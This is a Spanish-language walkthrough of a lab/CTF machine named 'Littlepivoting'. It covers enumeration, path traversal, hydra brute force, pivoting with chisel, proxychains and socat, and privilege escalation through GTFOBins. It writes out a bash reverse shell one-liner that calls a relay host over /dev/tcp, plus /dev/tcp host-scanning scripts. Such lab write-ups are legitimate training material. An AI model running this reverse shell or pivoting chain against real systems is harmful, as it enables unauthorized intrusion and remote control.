Littlepivoting (LINUX)

Primero desplegamos la maquina

Realizamos un escaneo de nmap:

nmap -sSVC -Pn -vvv -open -min-rate 5000 10.10.10.2

Hacemos un gobuster y encontramos "/shop"

Voy al index.php de /shop y intento ver el /etc/passwd pero no puedo, con un directory path traversal consigo ver el archivo con extio

Ahora vamos a hacer un ataque de fuerza bruta haciendo uso de la herramienta hydra

Ahora vamos a entrar al puerto ssh con los credenciales obtenidos.

Hacemos un hostname -I y vemos nuestra maquina victima(1 10.10.10.2) y nuestra maquinas victima (2, 20.20.20.2), vamos a correr el siguiente script para descubrir más IP's

#!/bin/bash

for host in $(seq 1 254); do
	timeout 1 bash -c "ping -c 1 20.20.20.$host &>/dev/null" && echo "[+] HOST - 20.20.20.$host"
done; wait

No tenemos conectividad a las IP's 20.20.20.0, por lo tanto vamos a usar chisel para redireccionar el trafico a nuestra maquina atacante haciendo un servidor de chisel

Hacemos un nano /etc/proxychains.conf y demarcamos dynamic_chain y marcamos con #strict_chain, y al final añadimos socks5 127.0.0.1 1080

Añadimos a foxyproxy la IP con socks5 127.0.0.1:1080

Para que nos funcione el gobuster tenemos q añadir --proxy y añadir el proxy de nuestro server chisel, encontramos "/secret.php"

El usuario "Mario" me da que podria ser el usuario de ssh de 20.20.20.3, asi que vamos a usar hydra

Encontramos los credenciales rapidamente :D

Vamos a conectarnos con proxychains (obviamente porque sino, como podriamos llegar a la 20.20.20.3 sin pasar por nuestro server chisel? (el cual tiene conexion a la 10.10.10.2, q a su vez tiene conectividad a la 20.20.20.2 y a su vez la 20.20.20.3))

Actualizamos nuestro canvas

Vemos que todos los usuarios pueden ejecutar vim asi que vamos a buscar GTOBins para binarios vulnerables

Bien, ahora vamos a correr el mismo script que de antes en busqueda de mas IP's, pero no funciona porque no tenenmos ping

#!/bin/bash

for host in $(seq 1 254); do

        timeout 1 bash -c "ping -c 1 30.30.30.$host &>/dev/null" && echo "[+] HOST - 30.30.30.$host is alive!" &

done; wait

Asi que vamos a usar el siguiente:

#!/bin/bash

for host in $(seq 1 254); do

        timeout 1 bash -c "echo '' > /dev/tcp/30.30.30.$host/80 &>/dev/null" && echo "[+] HOST - 30.30.30.$host" &

done; wait

Ahora a continuacion tendremos que usar socat, porque? Porque chisel solo puede redireccionar el trafico para adelante, encambio socat puede direccionar el trafico de otra maquina a otra (de puerto a puerto y ip). Instalar socat en vuestra maquina atacante, os hara falta

Vamos a usar scp para poder mandar los archivos utilizaremos la herramienta scp

Como queremos q desde manchi se redireccione a nuestro server chisel, vamos a hacer lo siguiente desde mario root (20.20.20.3/30.30.30.2):

Porque hemos puesto 1081 y no 1080? Porque el 1080 ya esta en uso por manchi, asi que vamos otra vez /etc/proxychains y vamos a añadir 127.0.0.1 1081

Añadimos a foxyproxy nuestro nuevo socks5 que nos dara acceso a la IP 30.30.30.3

Lo activamos y... Boom, tiene pinta que habra que subir una revershell como una casa

No se donde se ha subido entonces hago un escaneo rapido con gobuster

PERO antes de mandar la revershell tenemos que establecer 2 conexiones mas de socat

Ahora si mandamos la revershell

bash -c "bash -i >& /dev/tcp/30.30.30.2/5531 0>&1"

Depuramos la tty:
script /dev/null -c bash
*PRESIONAR CTRL+Z*
stty raw -echo;fg
reset xterm

Vemos que root puede ejecutar sin contraseña env, asi que vamos a GTFOBins a buscar el binario vulnerable

Ya hubieramos conseguido root

PreviousMemesploit (LINUX)NextDificil

Last updated 1 month ago